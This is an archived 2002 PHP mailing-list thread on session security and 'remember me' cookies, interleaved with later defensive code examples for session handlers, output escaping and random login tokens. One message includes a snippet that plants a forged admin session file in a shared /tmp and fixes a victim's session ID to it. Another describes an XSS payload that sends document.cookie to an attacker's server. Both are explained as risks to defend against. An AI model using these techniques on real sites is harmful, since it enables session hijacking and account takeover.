on 17/07/02 6:51 PM, John Holmes ([EMAIL PROTECTED]) wrote:

 ... and I am -- A shared host server that is.
 
 Now I'm not sure on this, I haven't tested it. Has anyone?

Is this particular vulnerability only in existence when the server is pretty
open?  I mean, on my particular host, I can't FTP to anything outside my
docroot, and I can't use SSH, telnet, etc.

phpinfo() says my session.save-path is /tmp -- since (in theory) I can't get
the files via telnet, FTP or HTTP, the only option I can think of would be
another user on the host gaining access to it via a PHP script... which I'm
not sure can be done, and can't really test, because I wouldn't know how to
do it.

Justin


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-17 Thread John Holmes

  ... and I am -- A shared host server that is.
 
  Now I'm not sure on this, I haven't tested it. Has anyone?
 
 Is this particular vulnerability only in existence when the server is pretty
 open?  I mean, on my particular host, I can't FTP to anything outside my
 docroot, and I can't use SSH, telnet, etc.

That's for you, but when you run a PHP script, you run it as user
Apache, www, nobody, etc...however your system is set up (if PHP is a
module).

 phpinfo() says my session.save-path is /tmp -- since (in theory) I can't get
 the files via telnet, FTP or HTTP, the only option I can think of would be
 another user on the host gaining access to it via a PHP script... which I'm
 not sure can be done, and can't really test, because I wouldn't know how to
 do it.

Yes, the attack could only come from someone on the same server. That's
why dedicated servers are preferred and why safe_mode is used on virtual
servers. Safe_mode may protect the sessions, too, not sure. 

<?php
$_SESSION['Logged_On'] = 1;
$_SESSION['Admin'] = 1;
$s = serialize($_SESSION);

$fp = fopen("/tmp/bad_session.file", "w");
fwrite($fp, $s);
fclose($fp);
?>

http://www.yoursite.com?PHPSESSID=bad_session

I don't have a virtual server environment to actually test this out
with, though...and it would require a lot of work from the hacker...but
what else do they have to do. Get a dedicated server...they really
aren't that expensive anymore.

---John Holmes...



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
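The exposure John describes comes from two things: session records living in a /tmp that every account on the box shares, and PHP adopting whatever ID the client presents. The defensive answer is a save handler that keeps session data in a store only this application can open, plus session.use_strict_mode so an unknown ID is replaced rather than trusted. This is an added example and not code from the thread: PrivateDbSessionHandler is a name chosen here, the SQLite path is a placeholder for the application's private datastore, and it assumes PHP 8.1+ with PDO and the sqlite driver (the SessionHandlerInterface and SessionUpdateTimestampHandlerInterface signatures are PHP's).

```php
<?php
// Added example, not John's code. Keeps session records out of the shared
// /tmp and refuses IDs that PHP could not have generated.
class PrivateDbSessionHandler implements SessionHandlerInterface,
    SessionUpdateTimestampHandlerInterface
{
    // Shape of IDs produced by session_create_id() with default settings.
    private const ID_PATTERN = '/^[A-Za-z0-9,-]{22,256}$/';

    public function __construct(private PDO $db)
    {
        $db->exec('CREATE TABLE IF NOT EXISTS sessions (id TEXT PRIMARY KEY,'
            . ' data TEXT NOT NULL, updated_at INTEGER NOT NULL)');
    }

    public function open(string $path, string $name): bool { return true; }
    public function close(): bool { return true; }

    public function read(string $id): string
    {
        if (!preg_match(self::ID_PATTERN, $id)) {
            return '';
        }
        $stmt = $this->db->prepare('SELECT data FROM sessions WHERE id = ?');
        $stmt->execute([$id]);
        $data = $stmt->fetchColumn();
        return $data === false ? '' : (string) $data;
    }

    public function write(string $id, string $data): bool
    {
        if (!preg_match(self::ID_PATTERN, $id)) {
            return false;
        }
        $stmt = $this->db->prepare(
            'REPLACE INTO sessions (id, data, updated_at) VALUES (?, ?, ?)');
        return $stmt->execute([$id, $data, time()]);
    }

    public function destroy(string $id): bool
    {
        return $this->db->prepare('DELETE FROM sessions WHERE id = ?')->execute([$id]);
    }

    // Called by PHP's probabilistic GC; $max_lifetime is session.gc_maxlifetime.
    public function gc(int $max_lifetime): int|false
    {
        $stmt = $this->db->prepare('DELETE FROM sessions WHERE updated_at < ?');
        return $stmt->execute([time() - $max_lifetime]) ? $stmt->rowCount() : false;
    }

    // With session.use_strict_mode=1 PHP asks the handler whether a client-
    // supplied ID names an existing, server-created session before adopting
    // it. A planted or guessed ID that fails this check is replaced by a
    // freshly generated one, which closes the ?PHPSESSID=... hole.
    public function validateId(string $id): bool
    {
        if (!preg_match(self::ID_PATTERN, $id)) {
            return false;
        }
        $stmt = $this->db->prepare('SELECT 1 FROM sessions WHERE id = ?');
        $stmt->execute([$id]);
        return $stmt->fetchColumn() !== false;
    }

    public function updateTimestamp(string $id, string $data): bool
    {
        return $this->write($id, $data);
    }
}

// Placeholder path: anywhere that is not world-writable and not shared
// with other accounts on the host.
$db = new PDO('sqlite:/srv/app-private/sessions.db');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
session_set_save_handler(new PrivateDbSessionHandler($db), true);
ini_set('session.use_strict_mode', '1');
session_start();
```

Without validateId() a custom handler accepts any ID in strict mode, so the interface pair matters: the format check alone stops path-like or oversized IDs, and the existence check is what makes strict mode effective against a record someone else wrote into the store.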




Re: [PHP] Sessions / logins / cookies / security

2002-07-17 Thread René Moonen

<snip>

What I'm looking to do is when a user logs in, I start up the session.. I
then have the registered session var to verify they are authenticated as
they move throughout the site.

</snip>

This solution is no guarantee that the authenticated user is in control 
during that session. The only thing you really *know* is that there was a 
successful authentication at the beginning of the current session and you 
would *assume* that the user is at the client screen during the 
complete session (the authenticated user could leave the browser 
unattended).

<snip>

Now, when they close the browser and come back, I want them to still be
authenticated.  

</snip>

The only thing you *know* for sure is that there was a valid 
authentication during some *previous* session. And that *some* user has 
still access to that client based on some client specific authentication 
(pressing ESC during Windows login dialog). So what's your definition of 
'authenticated'?

<snip>

What's the most secure way, that's not easily spoofed?  

</snip>

My point is this. You will never know for sure if the authenticated user 
is still in control in whatever session (not even the first). If you 
really need to be sure, you would use authentication more than once 
during a session. For example a first time login and then again just 
before the user wants to post or read important information.

If this is of no concern to your application, then it will be no problem 
to use cookies with some session identifier to allow continuing without 
authentication during the next session. But it might be wise to force 
authentication if a user were to enter some kind of admin area of your 
site during the second session.


Success


René




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




[PHP] Sessions / logins / cookies / security

2002-07-16 Thread Chad Day

I asked something similar a little while ago, but didn't do a good job
clarifying.

What I'm looking to do is when a user logs in, I start up the session.. I
then have the registered session var to verify they are authenticated as
they move throughout the site.

Now, when they close the browser and come back, I want them to still be
authenticated.  Obviously, I have to set a cookie.  But what do I set?  Do I
set just their user ID?  The MD5 of their password?  What's the most secure
way, that's not easily spoofed?  I don't know that much about cookies, but
if I just use a user ID, couldn't someone just change that ID value and
'become' another user?

Thanks for any advice,
Chad


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Chad Day

Anyone?  Can someone at least point me to some web article for
recommendations?  I saw some examples where a password variable was stored,
but is that really safe (as long as I MD5 it first?)

Chad

-Original Message-
From: Chad Day [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, July 16, 2002 12:30 PM
To: [EMAIL PROTECTED]
Subject: [PHP] Sessions / logins / cookies / security


I asked something similar a little while ago, but didn't do a good job
clarifying.

What I'm looking to do is when a user logs in, I start up the session.. I
then have the registered session var to verify they are authenticated as
they move throughout the site.

Now, when they close the browser and come back, I want them to still be
authenticated.  Obviously, I have to set a cookie.  But what do I set?  Do I
set just their user ID?  The MD5 of their password?  What's the most secure
way, that's not easily spoofed?  I don't know that much about cookies, but
if I just use a user ID, couldn't someone just change that ID value and
'become' another user?

Thanks for any advice,
Chad


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Johnson, Kirk


 What I'm looking to do is when a user logs in, I start up the 
 session.. I
 then have the registered session var to verify they are 
 authenticated as
 they move throughout the site.
 
 Now, when they close the browser and come back, I want them 
 to still be authenticated.

I don't think this can be a secure authentication. By relying on a cookie
for the authentication, the computer is being authenticated, not the user.
So anyone using the machine will be seen as authenticated. Anyone who
finds the cookie on a particular machine can place it on their own machine,
then their machine becomes authenticated.

If you need secure, real authentication, proof of the user's identity, the
user has to be asked to login each visit, IMO. In theory, only they know
their username and password.

Am I understanding the goal?

Kirk

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread 1LT John W. Holmes

There really isn't a good way to do this, I think.

Any time you're taking just a cookie, and using that data to assume who the
user is, it's open to hijacking. I can sniff the cookie or maybe find a
cross-site scripting bug to steal it, create the same cookie on my machine,
and poof, i'm that user.

Now, if it's just for a forum, or something simple, then just do it. It's
not worth worrying about someone hijacking my forum user.

Anyway, the best way to create the unique id is to use uniqid() in combo
with md5(). That'll give you a 32 character string that's  hard to predict
and isn't based on any of the user data.

www.php.net/uniqid

---John Holmes...

- Original Message -
From: Chad Day [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, July 16, 2002 3:30 PM
Subject: RE: [PHP] Sessions / logins / cookies / security


 Anyone?  Can someone at least point me to some web article for
 recommendations?  I saw some examples where a password variable was
stored,
 but is that really safe (as long as I MD5 it first?)

 Chad

 -Original Message-
 From: Chad Day [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, July 16, 2002 12:30 PM
 To: [EMAIL PROTECTED]
 Subject: [PHP] Sessions / logins / cookies / security


 I asked something similar a little while ago, but didn't do a good job
 clarifying.

 What I'm looking to do is when a user logs in, I start up the session.. I
 then have the registered session var to verify they are authenticated as
 they move throughout the site.

 Now, when they close the browser and come back, I want them to still be
 authenticated.  Obviously, I have to set a cookie.  But what do I set?  Do
I
 set just their user ID?  The MD5 of their password?  What's the most
secure
 way, that's not easily spoofed?  I don't know that much about cookies, but
 if I just use a user ID, couldn't someone just change that ID value and
 'become' another user?

 Thanks for any advice,
 Chad


 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Chris Shiflett

Chad Day wrote:

What I'm looking to do is when a user logs in, I start up the session.. I
then have the registered session var to verify they are authenticated as
they move throughout the site.

Now, when they close the browser and come back, I want them to still be
authenticated.  Obviously, I have to set a cookie.  But what do I set?  Do I
set just their user ID?  The MD5 of their password?  What's the most secure
way, that's not easily spoofed?  I don't know that much about cookies, but
if I just use a user ID, couldn't someone just change that ID value and
'become' another user?


Chad,

It sounds like you already have a good idea about the insecurity of the 
method you mentioned. For the most part, trust your instincts, 
especially when something seems insecure. :-) You just need to try to 
come up with a method that is difficult to break. Use your creativity, 
and for each method you can think of, consider what steps must be taken 
to break the security of that method. There is always a way, but 
changing the user ID isn't very difficult to achieve.

The cookie is a good idea, but the value of the cookie is what you need 
to think about. If its value is, as you mentioned, a user ID, someone 
could try to guess another valid user ID to impersonate another user. 
Remember that the cookie is data coming from the client that should not 
be trusted at all. Take the same precautions against client data as you 
would candy from a stranger; it doesn't mean it's necessarily bad candy, 
but you need to create some methods to give yourself pretty good 
assurance that it's not poisoned, etc. You want to inspect it.

In your case, you want to create some methods of assuring, to a 
reasonable extent, that the cookie is coming from the same client as 
before. With each connection, there are several things you can check, 
and you can decide whether it's more appropriate to store the data you 
want to check on the client or on the server.

For example, if you were to store the IP address in the cookie also, 
then someone would have to be coming from the same IP address as before 
(it would seem). Of course, an observant attacker would change the value 
of this cookie to their own IP to see if that helped them bypass this 
check, which it would. What if, instead, you stored the IP address on 
the server in a database associated with the unique ID? Then you can at 
least be fairly assured that this value cannot be changed. Another 
option for you might be to encrypt the IP address and keep it in the 
cookie. This way, if someone else tried to use the same cookie, their IP 
address would have to appear to be the same (which of course would 
happen if it's the same computer).

Other information you can get from the client includes the browser type, 
date, etc. The more things you check, and the more difficult you make it 
for the client to change this data (otherwise your checks aren't very 
useful), the more difficult you make impersonation. Just make sure to 
also cater to your legitimate users, which hopefully there will be more 
of. :-) If your users connect through a large LAN with multiple proxies, 
their IP address may fluctuate. Dialup users may have fluctuating IPs as 
well. If you require someone who fails your checks to only provide their 
password to continue, then the hassle you give your legitimate users is 
very minimal, and they might appreciate knowing you're looking out for 
the safety of their data.

These are just some ideas. You're ultimately the best person to decide 
what security model is best for your needs. Like I said, try to be 
creative and trust your instincts. A good procedure might be to design 
what you think is a sufficiently strong and useful security model for 
your needs and ask the list to come up with hypothetical methods that 
could be used to break it. If the attacks seem very easy to accomplish, 
you might need to rethink your methods.

Anyway, my point is that you want to educate yourself enough that *you* 
design the security of your site. Trusting others for your security is 
no better than trusting candy from strangers. :-)

Happy hacking.

Chris



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
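Chris's server-side variant (keep the client's characteristics next to the session ID on the server, compare on each request, and fall back to a password prompt rather than a hard failure) looks like the following. This is an added example, not Chris's code: client_fingerprint(), bind_session_to_client() and session_matches_client() are names chosen here, $_SESSION stands in for the "database associated with the unique ID" since PHP's session data never leaves the server, and /login.php is a hypothetical page that calls bind_session_to_client() once the password check has passed.

```php
<?php
// Added example, not from the thread. Assumes PHP 7.1+.
const FINGERPRINT_KEY = 'client_fp';

// What gets compared. Only the first two octets of the address are used so
// the dial-up and proxy-pool churn Chris mentions does not log users out;
// the User-Agent catches a cookie replayed from a different browser. Both
// values are chosen by the client, so this is a speed bump, not proof of
// identity, which is why a mismatch leads to a password prompt, not a ban.
function client_fingerprint(array $server): string
{
    $ip = $server['REMOTE_ADDR'] ?? '';
    $octets = explode('.', $ip);
    $prefix = count($octets) === 4 ? $octets[0] . '.' . $octets[1] : $ip;
    $ua = $server['HTTP_USER_AGENT'] ?? '';
    return hash('sha256', $prefix . '|' . $ua);
}

// Call right after a successful password check.
function bind_session_to_client(array $server): void
{
    // A new identity was just established: discard the ID the browser
    // arrived with so a pre-set ID cannot already be known to someone else.
    session_regenerate_id(true);
    $_SESSION[FINGERPRINT_KEY] = client_fingerprint($server);
    $_SESSION['logged_on'] = true;
}

// True when the session may be trusted for this request; false means
// "ask for the password again", the low-friction fallback Chris suggests.
function session_matches_client(array $server): bool
{
    if (empty($_SESSION['logged_on']) || !isset($_SESSION[FINGERPRINT_KEY])) {
        return false;
    }
    return hash_equals((string) $_SESSION[FINGERPRINT_KEY], client_fingerprint($server));
}

session_start();
if (!session_matches_client($_SERVER)) {
    // Drop the stale marker so the session cannot be used until the
    // password has been entered again (login.php is hypothetical).
    unset($_SESSION['logged_on'], $_SESSION[FINGERPRINT_KEY]);
    header('Location: /login.php');
    exit;
}
```

Storing the fingerprint server-side is what makes it worth checking: the cookie-side variant Chris dismisses fails precisely because the client can rewrite whatever the cookie holds.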




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

On my sites, I have a check box next to the login form which says remember
me.  If they tick this box, and their userid/password is valid, I set a
cookie on their system which remembers them, which is just their username
and an md5() of their password (the same data I add to the session).

When maintaining the session, I first check if there is a $_SESSION['uid']
and  $_SESSION['pwd'] -- if there is, I validate them (check against the
db).

If not, I then look for them in my cookie... if they exist, I validate them
(check against the db), and assign them to the session.


So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE.  If
there's nothing there, they aren't logged in as far as I can tell.  On every
page I validate the uid and pwd against the database, so the only way you
could fake being another user is to know the uid AND md5()'d pwd.


Justin French


on 17/07/02 2:30 AM, Chad Day ([EMAIL PROTECTED]) wrote:

 I asked something similar a little while ago, but didn't do a good job
 clarifying.
 
 What I'm looking to do is when a user logs in, I start up the session.. I
 then have the registered session var to verify they are authenticated as
 they move throughout the site.
 
 Now, when they close the browser and come back, I want them to still be
 authenticated.  Obviously, I have to set a cookie.  But what do I set?  Do I
 set just their user ID?  The MD5 of their password?  What's the most secure
 way, that's not easily spoofed?  I don't know that much about cookies, but
 if I just use a user ID, couldn't someone just change that ID value and
 'become' another user?
 
 Thanks for any advice,
 Chad
 


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread John Holmes

 So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE.  If
 there's nothing there, they aren't logged in as far as I can tell.  On every
 page I validate the uid and pwd against the database, so the only way you
 could fake being another user is to know the uid AND md5()'d pwd.

Or steal it. :)

I hope you have checked your site for any cross-site scripting
vulnerabilities. This is exactly where vulnerabilities like this come
into play...

---John Holmes...


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Analysis Solutions

On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote:
 I set a
 cookie on their system which remembers them, which is just their username
 and an md5() of their password (the same data I add to the session).

OUCH!  Sending the password back out to the net is a scary prospect.

--Dan

-- 
   PHP classes that make web design easier
SQL Solution  |   Layout Solution   |  Form Solution
sqlsolution.info  | layoutsolution.info |  formsolution.info
 T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
 4015 7 Av #4AJ, Brooklyn NY v: 718-854-0335 f: 718-854-0409

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

on 17/07/02 11:11 AM, Analysis  Solutions
([EMAIL PROTECTED]) wrote:

 On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote:
 I set a
 cookie on their system which remembers them, which is just their username
 and an md5() of their password (the same data I add to the session).
 
 OUCH!  Sending the password back out to the net is a scary prospect.

Interesting -- I haven't actually implemented this on a live site, but was
about to in the next few days... might hold off :)

How else can you verify the user in a remember me situation?


Justin


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

on 17/07/02 11:11 AM, John Holmes ([EMAIL PROTECTED]) wrote:

 Or steal it. :)
 
 I hope you have checked your site for any cross-site scripting
 vulnerabilities. This is exactly where vulnerabilities like this come
 into play...

Interesting -- I'm only a few days away from launching this... could you
elaborate on the potential risk, or point me to some documentation?

Thanks heaps,

Justin French


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread John Holmes

  Or steal it. :)
 
  I hope you have checked your site for any cross-site scripting
  vulnerabilities. This is exactly where vulnerabilities like this come
  into play...
 
 Interesting -- I'm only a few days away from launching this... could you
 elaborate on the potential risk, or point me to some documentation?

Just search google for Cross Site Scripting and you'll find a ton of
articles about that specifically. It all comes down to validating user
input and not displaying it directly back to the screen. 

Here is a link, for example, that'll pop up your cookies for cnn.com.
(watch the wrapping!)

http://cnn.looksmart.com/r_search?lizchqc=col=cnniqm=0st=1nh=10rf
=1venue=allkeyword=qp=search=0key=%3Cscript%3Ealert%28%27Hi%27%29%3
B%3C%2Fscript%3E

Now, how about instead of just executing alert(Hi), I do a
location.href='www.myserver.com?var='+document.cookie; and send myself
your cookie. Then I just simply make my cookie match yours, and poof,
I'm you. :)

It all comes down to validating user input and never showing it directly
back to the browser/screen. 

Similar problems exist for variables you use in database queries...

---John Holmes...


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
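John's post names the defence without showing it: never echo user input back as markup, and make sure a script that does slip through cannot read the session cookie. The block below is an added example, not John's code; render_search_echo_vulnerable(), render_search_echo() and e() are names chosen here, the search term is constructed input, and it assumes PHP 5.4+ for the ENT_HTML5 flag.

```php
<?php
// Added example, not from the thread. Two sides of the cookie-theft
// scenario John describes: output encoding, and cookie flags.

// Vulnerable: the term is placed into the page as-is, so a term that
// contains a <script> element is executed by the visitor's browser
// (the pattern behind the search-page link in John's post).
function render_search_echo_vulnerable(string $term): string
{
    return '<p>You searched for: ' . $term . '</p>';
}

// Hardened: every character with meaning in HTML is encoded, so the same
// term is shown as text. ENT_QUOTES covers both quote styles so the helper
// is also safe inside attribute values; the explicit charset avoids the
// encoding mismatches that have historically bypassed escaping.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_search_echo(string $term): string
{
    return '<p>You searched for: ' . e($term) . '</p>';
}

// Cookie-side hardening, set before session_start(). HttpOnly keeps the
// session cookie out of document.cookie, so the location.href trick in
// John's post has nothing to read even if an encoding bug remains;
// Secure keeps it off plain http where it could be sniffed.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
session_start();

$term = '<script>alert(1)</script>'; // constructed attacker-style input
echo render_search_echo($term);
```

HttpOnly narrows what an injected script can do; it does not make the injection harmless (the script still runs as the user), so the encoding helper is the primary control and the cookie flags are the backstop.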




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

Thanks heaps John,

So as a basic rule, having a uid and pwd stored as session variables is NOT
the problem, but storing the uid and/or pwd in a cookie on the browser is
just plain asking for it :)

So, how do you implement a remember me safely?

Setting JUST the uid in a cookie prevents people from knowing the pwd, but I
have to validate the user before granting access to pages... without a pwd,
it seems, e, impossible :)

Justin




 Just search google for Cross Site Scripting and you'll find a ton of
 articles about that specifically. It all comes down to validating user
 input and not displaying it directly back to the screen.
 
 Here is a link, for example, that'll pop up your cookies for cnn.com.
 (watch the wrapping!)
 
 http://cnn.looksmart.com/r_search?lizchqc=col=cnniqm=0st=1nh=10rf
 =1venue=allkeyword=qp=search=0key=%3Cscript%3Ealert%28%27Hi%27%29%3
 B%3C%2Fscript%3E
 
 Now, how about instead of just executing alert(Hi), I do a
 location.href='www.myserver.com?var='+document.cookie; and send myself
 your cookie. Then I just simply make my cookie match yours, and poof,
 I'm you. :)
 
 It all comes down to validating user input and never showing it directly
 back to the browser/screen.
 
 Similar problems exist for variables you use in database queries...
 
 ---John Holmes...
 


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread John Holmes

 So as a basic rule, having a uid and pwd stored as session variables is NOT
 the problem, but storing the uid and/or pwd in a cookie on the browser is
 just plain asking for it :)

You shouldn't even have to do this. Just set a $_SESSION['logged_on']
variable to true and check for that. Why carry around the username and
password??
 
 So, how do you implement a remember me safely?

You don't, if you have anything to protect. If it's just for a forum or
convenience and might just cause a little headache if someone's user is
hijacked, then you can do it with a cookie. 

 Setting JUST the uid in a cookie prevents people from knowing the pwd, but I
 have to validate the user before granting access to pages... without a pwd,
 it seems, e, impossible :)

Why do people insist on it being something related to the username and
password. Just use uniqid() and md5() to create a unique id for the user,
save it in their table, and use that in the cookie. If you base it off
of something, it makes it easier to crack...

---John Holmes...


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
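John's design, written out: the cookie carries a value that has nothing to do with the username or password, it is generated on the server, and it is looked up in the user's table row. This is an added example and not John's code. Two things differ from his post and are stated plainly: random_bytes() (PHP 7+) replaces uniqid()+md5(), because uniqid() is derived from the clock and md5() adds no entropy to it; and the table stores a hash of the token rather than the token itself, so a leaked users table does not hand out working cookies. The users table columns remember_hash and remember_expires are assumed, the PDO connection is the application's own, and PHP 7.3+ is assumed for the setcookie() options array.

```php
<?php
// Added example, not from the thread. Schema assumed:
//   users(id INTEGER, remember_hash TEXT NULL, remember_expires INTEGER NULL)
const REMEMBER_COOKIE = 'remember';
const REMEMBER_DAYS = 30;

// Call after a successful password login when "remember me" was ticked.
function issue_remember_token(PDO $db, int $userId): void
{
    $token = bin2hex(random_bytes(32));            // 256 random bits
    $expires = time() + REMEMBER_DAYS * 86400;
    $stmt = $db->prepare('UPDATE users SET remember_hash = ?, remember_expires = ?'
        . ' WHERE id = ?');
    $stmt->execute([hash('sha256', $token), $expires, $userId]);

    // Secure: never sent over plain http; HttpOnly: not readable by script
    // in the page; SameSite=Lax: not attached to cross-site POSTs.
    setcookie(REMEMBER_COOKIE, $userId . ':' . $token, [
        'expires'  => $expires,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Returns the user id the cookie proves, or null. The caller then sets
// $_SESSION['logged_on'] exactly as it would after a password login.
function user_from_remember_cookie(PDO $db, array $cookies): ?int
{
    $parts = explode(':', $cookies[REMEMBER_COOKIE] ?? '', 2);
    if (count($parts) !== 2 || !ctype_digit($parts[0]) || !ctype_xdigit($parts[1])) {
        return null;
    }
    [$userId, $token] = $parts;
    $stmt = $db->prepare('SELECT remember_hash, remember_expires FROM users WHERE id = ?');
    $stmt->execute([(int) $userId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$row || !is_string($row['remember_hash']) || $row['remember_expires'] < time()) {
        return null;
    }
    // Constant-time compare so the lookup cannot be used as a timing oracle.
    if (!hash_equals($row['remember_hash'], hash('sha256', $token))) {
        return null;
    }
    return (int) $userId;
}

// Revoke on logout or password change: one UPDATE invalidates every copy
// of the cookie, which is not possible when the cookie carries md5(pwd).
function revoke_remember_token(PDO $db, int $userId): void
{
    $db->prepare('UPDATE users SET remember_hash = NULL, remember_expires = NULL'
        . ' WHERE id = ?')->execute([$userId]);
    setcookie(REMEMBER_COOKIE, '', ['expires' => 1, 'path' => '/']);
}
```

Because the cookie value is unrelated to the credentials, a stolen cookie buys the thief exactly one revocable token and nothing about the password, which is the property John is after; the remaining exposure is the cookie-theft route his earlier post covers.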




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

on 17/07/02 12:35 PM, John Holmes ([EMAIL PROTECTED]) wrote:

 You shouldn't even have to do this. Just set a $_SESSION['logged_on']
 variable to true and check for that. Why carry around the username and
 password??

Well, I guess it's because I started with someone else's script, and built
my own from there.  Not being a security expert, I assumed that they did
this for a reason.

Are you saying that setting $_SESSION['logged_on'] after I've validated
their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

Interesting stuff...

So the real problem with sessions is hijacking the session ID, not fake
$_SESSION vars.


I guess I need to look into session hijacking next.


 So, how do you implement a remember me safely?
 
 You don't, if you have anything to protect. If it's just for a forum or
 convenience and might just cause a little headache if someone's user is
 hijacked, then you can do it with a cookie.

What about if the cookie was set under https / SSL


 Why do people insist on it being something related to the username and
 password. Just use uniqid() and md5() to create a unique id for the user,
 save it in their table, and use that in the cookie. If you base it off
 of something, it makes it easier to crack...

Good point.


Thanks for your advice.


Justin French


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread John Holmes

  You shouldn't even have to do this. Just set a $_SESSION['logged_on']
  variable to true and check for that. Why carry around the username and
  password??
 
 Well, I guess it's because I started with someone else's script, and built
 my own from there.  Not being a security expert, I assumed that they did
 this for a reason.
 
 Are you saying that setting $_SESSION['logged_on'] after I've validated
 their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

Sure, why not? Users can't create session variables (unless you're on a
virtual server...)

 Interesting stuff...
 
 So the real problem with sessions is hijacking the session ID, not fake
 $_SESSION vars.

Correct. The good thing with sessions is that they only last for as long
as the browser is open. So you can't come back and hijack a user. You'd
have to do it at the same time that the user is online.
 
 
 I guess I need to look into session hijacking next.
 
 
  So, how do you implement a remember me safely?
 
  You don't, if you have anything to protect. If it's just for a forum or
  convenience and might just cause a little headache if someone's user is
  hijacked, then you can do it with a cookie.
 
 What about if the cookie was set under https / SSL

It makes it secure from sniffing... I don't think it would help for a
cross site scripting vulnerability, though...

---John Holmes...


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread Justin French

on 17/07/02 1:05 PM, John Holmes ([EMAIL PROTECTED]) wrote:

 Sure, why not? Users can't create session variables (unless you're on a
 virtual server...)

... and I am -- A shared host server that is.


Justin French


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-16 Thread César Aracena

I came across the same problem a few weeks ago, and thought (didn't do it
though) that the best way to handle this kind of security, would be to
make an ID/cookie for the user/session which deletes itself after the
browser is closed, but not storing the password.

Then, if that same user wants to open a new session in other computer at
the same time, I would have a *REPLICATION* script which looks up that
user and tells him that he already has an open session and that he should
type the password again (like Hotmail does). Makes sense?

C.

 -Original Message-
 From: 1LT John W. Holmes [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, July 16, 2002 4:51 PM
 To: Chad Day; [EMAIL PROTECTED]
 Subject: Re: [PHP] Sessions / logins / cookies / security
 
 There really isn't a good way to do this, I think.
 
 Any time you're taking just a cookie, and using that data to assume who
 the user is, it's open to hijacking. I can sniff the cookie or maybe find
 a cross-site scripting bug to steal it, create the same cookie on my
 machine, and poof, I'm that user.
 
 Now, if it's just for a forum, or something simple, then just do it. It's
 not worth worrying about someone hijacking my forum user.
 
 Anyway, the best way to create the unique id is to use uniqid() in combo
 with md5(). That'll give you a 32 character string that's hard to predict
 and isn't based on any of the user data.
 
 www.php.net/uniqid
 
 ---John Holmes...
 
 - Original Message -
 From: Chad Day [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Tuesday, July 16, 2002 3:30 PM
 Subject: RE: [PHP] Sessions / logins / cookies / security
 
 
  Anyone?  Can someone at least point me to some web article for
  recommendations?  I saw some examples where a password variable was
  stored, but is that really safe (as long as I MD5 it first?)
